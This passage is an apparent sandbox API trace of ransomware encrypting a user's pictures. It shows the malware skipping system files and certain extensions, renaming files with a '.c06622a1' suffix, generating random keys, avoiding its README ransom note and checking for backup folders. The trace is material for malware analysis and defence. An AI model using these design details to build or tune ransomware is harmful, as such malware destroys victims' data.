(_String="ocx") returned 0x3 [0167.297] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0167.297] wcslen (_String="prf") returned 0x3 [0167.297] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0167.297] wcslen (_String="ps1") returned 0x3 [0167.297] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0167.297] wcslen (_String="rom") returned 0x3 [0167.297] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0167.297] wcslen (_String="rtp") returned 0x3 [0167.297] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0167.298] wcslen (_String="scr") returned 0x3 [0167.298] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0167.298] wcslen (_String="shs") returned 0x3 [0167.298] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0167.298] wcslen (_String="spl") returned 0x3 [0167.298] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0167.298] wcslen (_String="sys") returned 0x3 [0167.298] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.298] wcslen (_String="theme") returned 0x5 [0167.298] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.298] wcslen (_String="themepack") returned 0x9 [0167.298] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.298] wcslen (_String="wpx") returned 0x3 [0167.298] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.298] wcslen (_String="lock") returned 0x4 [0167.298] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.298] wcslen (_String="key") returned 0x3 [0167.298] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.298] wcslen (_String="hta") returned 0x3 [0167.298] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.298] wcslen (_String="msi") returned 0x3 [0167.298] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.298] wcslen (_String="pdb") returned 0x3 [0167.298] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.298] wcslen (_String="sqlite") returned 0x6 [0167.298] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_")) returned 0x10 [0167.298] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32e20b0 [0167.298] wcscpy (in: _Dest=0x32e20b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" [0167.299] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_") returned 0x52 [0167.299] wcscpy (in: _Dest=0x32e2156, _Source="MTfAnkz2mAL.jpg" | out: _Dest="MTfAnkz2mAL.jpg") returned="MTfAnkz2mAL.jpg" [0167.299] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\MTfAnkz2mAL.jpg", dwFileAttributes=0x80) returned 1 [0167.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\MTfAnkz2mAL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\mtfankz2mal.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0167.299] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.299] ReadFile (in: hFile=0x1b0, lpBuffer=0x32e224, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e2b4, lpOverlapped=0x0 | out: lpBuffer=0x32e224*, lpNumberOfBytesRead=0x32e2b4*=0x90, lpOverlapped=0x0) returned 1 [0167.300] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e224, Length=0x80) returned 0x9575d6a8 [0167.300] RtlComputeCrc32 (PartialCrc=0xd6a8, Buffer=0x32e224, Length=0x80) returned 0xe7cbcce2 [0167.300] RtlComputeCrc32 (PartialCrc=0xcce2, Buffer=0x32e224, Length=0x80) returned 0xa7450e68 [0167.300] RtlComputeCrc32 (PartialCrc=0xe68, Buffer=0x32e224, Length=0x80) returned 0x62c7e93c [0167.300] RtlComputeCrc32 (PartialCrc=0xe93c, Buffer=0x32e224, Length=0x80) returned 0xa5daaef6 [0167.300] CloseHandle (hObject=0x1b0) returned 1 [0167.300] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32f20b8 [0167.300] wcscpy (in: _Dest=0x32f20b8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\MTfAnkz2mAL.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\MTfAnkz2mAL.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\MTfAnkz2mAL.jpg" [0167.300] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\MTfAnkz2mAL.jpg") returned 0x62 [0167.300] wcscpy (in: _Dest=0x32f217c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.300] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\MTfAnkz2mAL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\mtfankz2mal.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\MTfAnkz2mAL.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\mtfankz2mal.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\MTfAnkz2mAL.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\mtfankz2mal.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b0 [0167.303] CreateIoCompletionPort (FileHandle=0x1b0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.303] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0167.311] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b7b5e67 [0167.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x74608d26 [0167.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6b2b7081 [0167.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3c6c24a1 [0167.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x77431bf8 [0167.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xb1a2d83 [0167.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66d93e6a [0167.312] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x28fe3f3d [0167.315] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x419ba990 [0167.315] RtlComputeCrc32 (PartialCrc=0xa990, Buffer=0x2b70094, Length=0x80) returned 0x96e1b83b [0167.315] RtlComputeCrc32 (PartialCrc=0xb83b, Buffer=0x2b70094, Length=0x80) returned 0x2570788f [0167.315] RtlComputeCrc32 (PartialCrc=0x788f, Buffer=0x2b70094, Length=0x80) returned 0xa2ed52a2 [0167.315] RtlComputeCrc32 (PartialCrc=0x52a2, Buffer=0x2b70094, Length=0x80) returned 0x4d8ef4f8 [0167.315] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0167.315] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32e20b0) returned 1 [0167.315] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32f20b8) returned 1 [0167.315] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ed4d20, ftCreationTime.dwHighDateTime=0x1d5e307, ftLastAccessTime.dwLowDateTime=0x835c1210, ftLastAccessTime.dwHighDateTime=0x1d5ddc6, ftLastWriteTime.dwLowDateTime=0x835c1210, ftLastWriteTime.dwHighDateTime=0x1d5ddc6, nFileSizeHigh=0x0, nFileSizeLow=0x15b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="mV L-Vgm2.bmp", cAlternateFileName="MVL-VG~1.BMP")) returned 1 [0167.315] _wcsicmp (_Str1="mV L-Vgm2.bmp", _Str2="README.c06622a1.TXT") returned -5 [0167.315] wcsstr (_Str="mV L-Vgm2.bmp", _SubStr="README") returned 0x0 [0167.315] _wcsicmp (_Str1="autorun.inf", _Str2="mV L-Vgm2.bmp") returned -12 [0167.315] wcslen (_String="autorun.inf") returned 0xb [0167.315] _wcsicmp (_Str1="boot.ini", _Str2="mV L-Vgm2.bmp") returned -11 [0167.315] wcslen (_String="boot.ini") returned 0x8 [0167.315] _wcsicmp (_Str1="bootfont.bin", _Str2="mV L-Vgm2.bmp") returned -11 [0167.315] wcslen (_String="bootfont.bin") returned 0xc [0167.315] _wcsicmp (_Str1="bootsect.bak", _Str2="mV L-Vgm2.bmp") returned -11 [0167.315] wcslen (_String="bootsect.bak") returned 0xc [0167.315] _wcsicmp (_Str1="desktop.ini", _Str2="mV L-Vgm2.bmp") returned -9 [0167.315] wcslen (_String="desktop.ini") returned 0xb [0167.316] _wcsicmp (_Str1="iconcache.db", _Str2="mV L-Vgm2.bmp") returned -4 [0167.316] wcslen (_String="iconcache.db") returned 0xc [0167.316] _wcsicmp (_Str1="ntldr", _Str2="mV L-Vgm2.bmp") returned 1 [0167.316] wcslen (_String="ntldr") returned 0x5 [0167.316] _wcsicmp (_Str1="ntuser.dat", _Str2="mV L-Vgm2.bmp") returned 1 [0167.316] wcslen (_String="ntuser.dat") returned 0xa [0167.316] _wcsicmp (_Str1="ntuser.dat.log", _Str2="mV L-Vgm2.bmp") returned 1 [0167.316] wcslen (_String="ntuser.dat.log") returned 0xe [0167.316] _wcsicmp (_Str1="ntuser.ini", _Str2="mV L-Vgm2.bmp") returned 1 [0167.316] wcslen (_String="ntuser.ini") returned 0xa [0167.316] _wcsicmp (_Str1="thumbs.db", _Str2="mV L-Vgm2.bmp") returned 7 [0167.316] wcslen (_String="thumbs.db") returned 0x9 [0167.316] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0167.316] wcslen (_String="386") returned 0x3 [0167.316] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0167.316] wcslen (_String="adv") returned 0x3 [0167.316] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0167.316] wcslen (_String="ani") returned 0x3 [0167.316] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0167.316] wcslen (_String="bat") returned 0x3 [0167.316] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0167.316] wcslen (_String="bin") returned 0x3 [0167.316] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0167.316] wcslen (_String="cab") returned 0x3 [0167.316] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0167.316] wcslen (_String="cmd") returned 0x3 [0167.316] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0167.316] wcslen (_String="com") returned 0x3 [0167.317] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0167.317] wcslen (_String="cpl") returned 0x3 [0167.317] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0167.317] wcslen (_String="cur") returned 0x3 [0167.317] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0167.317] wcslen (_String="deskthemepack") returned 0xd [0167.317] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0167.317] wcslen (_String="diagcab") returned 0x7 [0167.317] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0167.317] wcslen (_String="diagcfg") returned 0x7 [0167.317] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0167.317] wcslen (_String="diagpkg") returned 0x7 [0167.317] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0167.317] wcslen (_String="dll") returned 0x3 [0167.317] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0167.317] wcslen (_String="drv") returned 0x3 [0167.317] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0167.317] wcslen (_String="exe") returned 0x3 [0167.317] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0167.317] wcslen (_String="hlp") returned 0x3 [0167.317] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0167.317] wcslen (_String="icl") returned 0x3 [0167.317] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0167.317] wcslen (_String="icns") returned 0x4 [0167.317] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0167.317] wcslen (_String="ico") returned 0x3 [0167.317] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0167.317] wcslen (_String="ics") returned 0x3 [0167.317] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0167.317] wcslen (_String="idx") returned 0x3 [0167.317] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0167.317] wcslen (_String="ldf") returned 0x3 [0167.317] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0167.318] wcslen (_String="lnk") returned 0x3 [0167.318] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0167.318] wcslen (_String="mod") returned 0x3 [0167.318] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0167.318] wcslen (_String="mpa") returned 0x3 [0167.318] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0167.318] wcslen (_String="msc") returned 0x3 [0167.318] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0167.318] wcslen (_String="msp") returned 0x3 [0167.318] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0167.318] wcslen (_String="msstyles") returned 0x8 [0167.318] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0167.318] wcslen (_String="msu") returned 0x3 [0167.318] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0167.318] wcslen (_String="nls") returned 0x3 [0167.318] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0167.318] wcslen (_String="nomedia") returned 0x7 [0167.318] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0167.318] wcslen (_String="ocx") returned 0x3 [0167.318] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0167.318] wcslen (_String="prf") returned 0x3 [0167.318] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0167.318] wcslen (_String="ps1") returned 0x3 [0167.318] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0167.318] wcslen (_String="rom") returned 0x3 [0167.318] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0167.318] wcslen (_String="rtp") returned 0x3 [0167.318] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0167.318] wcslen (_String="scr") returned 0x3 [0167.318] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0167.318] wcslen (_String="shs") returned 0x3 [0167.319] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0167.319] wcslen (_String="spl") returned 0x3 [0167.319] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0167.319] wcslen (_String="sys") returned 0x3 [0167.319] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0167.319] wcslen (_String="theme") returned 0x5 [0167.319] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0167.319] wcslen (_String="themepack") returned 0x9 [0167.319] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0167.319] wcslen (_String="wpx") returned 0x3 [0167.319] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0167.319] wcslen (_String="lock") returned 0x4 [0167.319] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0167.319] wcslen (_String="key") returned 0x3 [0167.319] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0167.319] wcslen (_String="hta") returned 0x3 [0167.319] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0167.319] wcslen (_String="msi") returned 0x3 [0167.319] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0167.319] wcslen (_String="pdb") returned 0x3 [0167.319] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0167.319] wcslen (_String="sqlite") returned 0x6 [0167.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_")) returned 0x10 [0167.319] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32e20b0 [0167.319] wcscpy (in: _Dest=0x32e20b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_" [0167.319] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_") returned 0x52 [0167.319] wcscpy (in: _Dest=0x32e2156, _Source="mV L-Vgm2.bmp" | out: _Dest="mV L-Vgm2.bmp") returned="mV L-Vgm2.bmp" [0167.320] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\mV L-Vgm2.bmp", dwFileAttributes=0x80) returned 1 [0167.320] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\mV L-Vgm2.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\mv l-vgm2.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0167.320] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.320] ReadFile (in: hFile=0x1dc, lpBuffer=0x32e224, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32e2b4, lpOverlapped=0x0 | out: lpBuffer=0x32e224*, lpNumberOfBytesRead=0x32e2b4*=0x90, lpOverlapped=0x0) returned 1 [0167.321] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e224, Length=0x80) returned 0x590202c0 [0167.321] RtlComputeCrc32 (PartialCrc=0x2c0, Buffer=0x32e224, Length=0x80) returned 0x217a406a [0167.321] RtlComputeCrc32 (PartialCrc=0x406a, Buffer=0x32e224, Length=0x80) returned 0x7e738a19 [0167.321] RtlComputeCrc32 (PartialCrc=0x8a19, Buffer=0x32e224, Length=0x80) returned 0x9d37ad7f [0167.321] RtlComputeCrc32 (PartialCrc=0xad7f, Buffer=0x32e224, Length=0x80) returned 0x9ea9564e [0167.321] CloseHandle (hObject=0x1dc) returned 1 [0167.321] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x32f20b8 [0167.321] wcscpy (in: _Dest=0x32f20b8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\mV L-Vgm2.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\mV L-Vgm2.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\mV L-Vgm2.bmp" [0167.321] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\mV L-Vgm2.bmp") returned 0x60 [0167.321] wcscpy (in: _Dest=0x32f2178, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.321] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\mV L-Vgm2.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\mv l-vgm2.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\mV L-Vgm2.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\mv l-vgm2.bmp.c06622a1"), dwFlags=0x8) returned 1 [0167.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\iwvH BdfW9G\\_MTmDgixdwsa7RVqo\\CD22\\n9X_\\mV L-Vgm2.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\iwvh bdfw9g\\_mtmdgixdwsa7rvqo\\cd22\\n9x_\\mv l-vgm2.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1dc [0167.323] CreateIoCompletionPort (FileHandle=0x1dc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.323] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0167.332] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x16a1d14f [0167.332] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4a32a93a [0167.332] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6bd391c0 [0167.332] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x40656c69 [0167.332] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x164cd817 [0167.332] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f50db41 [0167.332] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3d82c098 [0167.332] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x70e5d207 [0167.335] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0x721afbc5 [0167.335] RtlComputeCrc32 (PartialCrc=0xfbc5, Buffer=0x3480094, Length=0x80) returned 0xe9ad9bda [0167.335] RtlComputeCrc32 (PartialCrc=0x9bda, Buffer=0x3480094, Length=0x80) returned 0xb2957577 [0167.335] RtlComputeCrc32 (PartialCrc=0x7577, Buffer=0x3480094, Length=0x80) returned 0xeee2634d [0167.335] RtlComputeCrc32 (PartialCrc=0x634d, Buffer=0x3480094, Length=0x80) returned 0x90345db5 [0167.336] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0167.336] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32e20b0) returned 1 [0167.336] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32f20b8) returned 1 [0167.336] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9160b6e0, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x9160b6e0, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x9160b6e0, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.336] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.336] FindNextFileW (in: hFindFile=0x154248, lpFindFileData=0x32e39c | out: lpFindFileData=0x32e39c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.336] FindClose (in: hFindFile=0x154248 | out: hFindFile=0x154248) returned 1 [0167.336] _wcsicmp (_Str1="backup", _Str2="n9X_") returned -12 [0167.336] wcslen (_String="backup") returned 0x6 [0167.336] _wcsicmp (_Str1="bak", _Str2="n9X_") returned -12 [0167.336] wcslen (_String="bak") returned 0x3 [0167.336] _wcsicmp (_Str1="back", _Str2="n9X_") returned -12 [0167.336] wcslen (_String="back") returned 0x4 [0167.336] _wcsicmp (_Str1="archive", _Str2="n9X_") returned -13 [0167.336] wcslen (_String="archive") returned 0x7 [0167.336] _wcsicmp (_Str1="bckp", _Str2="n9X_") returned -12 [0167.336] wcslen (_String="bckp") returned 0x4 [0167.336] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32b2098) returned 1 [0167.338] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x32c20a0) returned 1 [0167.339] FindNextFileW (in: hFindFile=0x154208, lpFindFileData=0x32e61c | out: lpFindFileData=0x32e61c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe820af00, ftCreationTime.dwHighDateTime=0x1d5e2e2, ftLastAccessTime.dwLowDateTime=0xf3859010, ftLastAccessTime.dwHighDateTime=0x1d5e3da, ftLastWriteTime.dwLowDateTime=0xf3859010, 